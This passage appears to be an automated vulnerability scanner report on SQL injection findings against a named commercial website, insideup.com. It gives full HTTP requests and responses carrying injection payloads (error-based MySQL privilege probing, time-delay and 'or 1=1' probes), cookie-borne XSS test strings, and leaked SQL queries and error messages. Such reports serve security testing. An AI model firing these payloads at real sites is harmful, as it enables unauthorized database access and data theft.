OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:55:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2iip6t2tboqkimm9qguqkrm8s1; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/leadflow/inco00/project.php was not found on this server.</p>

1.431. http://www.insideup.com/ppc/leadflow/inco00/leadflow/inco00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/leadflow/inco00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId=&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:06:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nb5sdml1r11akij4ecrcj90kr6; path=/
Content-Length: 2246
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&1'=1' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/inco00/leadflow/inco00/project.php?catId=&' at line 5

Request 2

GET /ppc/leadflow/inco00/leadflow/inco00/project.php?catId=&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:06:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k5r489loa3ob3h516tgdiq2653; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/inco00/leadflow/inco00/project.php was not found on this server.</p>

1.432. http://www.insideup.com/ppc/leadflow/inco00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7438
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(SELECT user)LIMIT 1),0x59),0,0x4E)),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&phone=Phone&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow''/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20IF(STRCMP((SELECT%20Super_priv%20FROM%20mysql.user%20WHERE%20user=(SELECT%20user)LIMIT%201),0x59),0,0x4E))%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rd0k9cp5s1tjo7qljvpf83gi93; JSESSIONID=787F5FBFC16FAAF1CA4C52F05D2F2B96; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7323
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.433. http://www.insideup.com/ppc/leadflow/inco00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10666913'%20or%201%3d1--%20 and 10666913'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/inco0010666913'%20or%201%3d1--%20/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=70s8jl3smcvrvp347ut5iiglg2; JSESSIONID=90ED5542F8D0357682DAE5A7AFA2F040; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
